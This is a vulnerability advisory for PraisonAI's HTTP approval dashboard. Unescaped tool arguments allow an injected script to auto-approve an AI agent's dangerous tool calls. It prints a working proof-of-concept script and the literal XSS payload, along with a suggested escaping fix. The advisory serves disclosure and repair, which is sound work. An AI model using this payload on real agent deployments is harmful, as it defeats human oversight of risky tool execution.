PT-2026-53126 · Pypi · Praisonai
Published
2026-06-18
·
Updated
2026-06-18
CVSS v3.1
8.8
High
| Vector | AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H |
HTTPApproval dashboard renders tool arguments as raw HTML, allowing approval-page XSS to approve dangerous tools
Summary
praisonai.bots.HTTPApproval renders pending tool approval arguments directly
into the approval dashboard HTML. An attacker-controlled tool argument can
inject JavaScript into that page. When a human opens the approval URL to inspect
the risky tool request, the script runs in the dashboard origin and can POST to
the same request's /approve/{request id}/decide endpoint, causing
HTTPApproval to return approved=True.The local PoV uses a harmless
touch /tmp/prai010 # command prefix and stops at
the approval decision. It does not execute the command.Affected Versions
Proposed affected range:
>= 4.5.2, <= 4.6.57.Validated affected:
- current head
2f9677abb2ea68eab864ee8b6a828fd0141612e1(v4.6.57-4-g2f9677ab) v4.5.2v4.5.3v4.5.124v4.5.126v4.5.128v4.6.10v4.6.56v4.6.57
v4.5.0 and v4.5.1 do not contain the HTTPApproval backend.Impact
An attacker who can influence an agent task or prompt enough to produce a
dangerous tool call can embed a short XSS payload in the tool argument. When the
human approver opens the HTTP approval page, the script can approve the pending
dangerous tool call before the human explicitly clicks Approve or Deny.
This bypasses the human-in-the-loop approval boundary for dangerous tools such
as
execute command, execute code, delete file, or other tools gated
through HTTPApproval. If the agent continues after approval, the dangerous
tool runs with the privileges of the PraisonAI process.Why This Is Not Intended Behavior
PraisonAI documentation describes approval as a safety control that pauses an
agent before risky tools and asks a human or configured channel to allow or deny
execution. The documentation also lists
http as a supported non-console
approval backend.Opening the approval page to inspect a risky command should not itself approve
the command. The current behavior allows attacker-controlled tool arguments to
execute script in the approval page and submit the approval action.
This is distinct from the previously published stored-XSS advisory for agent
output rendering. That advisory concerned
src/praisonai/api.py and missing
nh3 sanitization in older versions. This report concerns the HTTPApproval
dashboard sink and remains present in current head.Root Cause
In
src/praisonai/praisonai/bots/ http approval.py, build html() builds the
approval page with raw f-string interpolation:- argument keys and values are appended to
args htmlwithout HTML escaping; tool name,risk level, andagent nameare also interpolated into the returned HTML;- the generated page contains same-origin JavaScript that posts to
/approve/{request id}/decide.
handle decide() accepts JSON from that endpoint and marks the pending request
approved when decision == "approve".Because the approval page is generated from the pending request's unescaped tool
arguments, an injected script can call the same endpoint that the legitimate
Approve button uses. The request id is unguessable, but the script runs inside
the loaded approval page and can derive the endpoint from
location.pathname.Reproduction
The PoV is local-only and does not execute the dangerous tool command. Run it
from a PraisonAI checkout or environment where
praisonai and
praisonaiagents import from the candidate version.python
import asyncio
import json
import socket
import aiohttp
from praisonai.bots. http approval import HTTPApproval
from praisonaiagents.approval.protocols import ApprovalRequest
def free port():
with socket.socket(socket.AF INET, socket.SOCK STREAM) as sock:
sock.bind(("127.0.0.1", 0))
return sock.getsockname()[1]
payload = (
"touch /tmp/prai010 # "
"</code><script>"
"fetch(location.pathname+'/decide',{"
"method:'POST',headers:{'Content-Type':'application/json'},"
"body:'{"decision":"approve"}'})"
"</script><code>"
)
async def main():
backend = HTTPApproval(host="127.0.0.1", port=free port(), timeout=5)
request = ApprovalRequest(
tool name="execute command",
arguments={"command": payload},
risk level="critical",
agent name="pov-agent",
)
task = asyncio.create task(backend.request approval(request))
request id = ""
for in range(100):
if backend. pending:
request id = next(iter(backend. pending))
break
await asyncio.sleep(0.05)
assert request id
url = f"http://127.0.0.1:{backend. port}/approve/{request id}"
async with aiohttp.ClientSession() as session:
async with session.get(url) as response:
page = await response.text()
raw script present = "<script>fetch(location.pathname+'/decide'" in page
script not html escaped = "<script" not in page
payload uses same origin decide endpoint = "fetch(location.pathname+'/decide'" in page
payload not truncated = "..." not in page[
page.find("<script>"):page.find("<script>") + len(payload) + 10
]
assert raw script present
assert script not html escaped
assert payload not truncated
# Same request the injected same-origin script submits.
async with session.post(f"{url}/decide", json={"decision": "approve"}) as response:
post body = await response.text()
decision = await task
await backend.shutdown()
print(json.dumps({
"payload len": len(payload),
"payload shell prefix": "touch /tmp/prai010",
"raw script present": raw script present,
"script not html escaped": script not html escaped,
"payload uses same origin decide endpoint": payload uses same origin decide endpoint,
"payload not truncated": payload not truncated,
"post body": post body,
"decision approved": decision.approved,
"decision reason": decision.reason,
"vulnerable": bool(
raw script present
and script not html escaped
and payload uses same origin decide endpoint
and payload not truncated
and decision.approved
),
}, indent=2))
asyncio.run(main())Expected affected output includes:
json
{
"payload len": 175,
"payload shell prefix": "touch /tmp/prai010",
"raw script present": true,
"script not html escaped": true,
"payload uses same origin decide endpoint": true,
"payload not truncated": true,
"decision approved": true,
"vulnerable": true
}The relevant injected argument shape is:
text
touch /tmp/prai010 # </code><script>fetch(location.pathname+'/decide',{method:'POST',headers:{'Content-Type':'application/json'},body:'{"decision":"approve"}'})</script><code>The shell prefix demonstrates that the same argument can be executable shell
syntax after approval; the PoV stops before executing the tool.
Suggested Fix
Escape every untrusted value before inserting it into the approval HTML:
tool namerisk levelagent name- every argument key
- every argument value
For example, use
html.escape(str(value), quote=True) or a template engine that
auto-escapes by default. Add regression tests that include </code><script>...
in tool arguments and assert that the rendered page contains escaped text, not a
script element.Minimal patch shape:
python
from html import escape
def h(value: object) -> str:
return escape(str(value), quote=True)
tool name = h(info.get("tool name", "unknown"))
risk level = h(info.get("risk level", "unknown"))
agent name = h(info.get("agent name", ""))
args html = ""
for k, v in arguments.items():
val str = str(v)
if len(val str) > 200:
val str = val str[:197] + "..."
args html += (
f"<tr><td><code>{h(k)}</code></td>"
f"<td><code>{h(val str)}</code></td></tr>"
)Additional hardening:
- avoid inline JavaScript and add a restrictive Content Security Policy;
- keep the request id as an unguessable capability, but do not rely on it as an XSS defense;
- consider requiring a per-request decision token outside attacker-controlled rendered argument fields.
Fix
XSS
Found an issue in the description? Have something to add? Feel free to write us 👾
Weakness Enumeration
Related Identifiers
Affected Products
Praisonai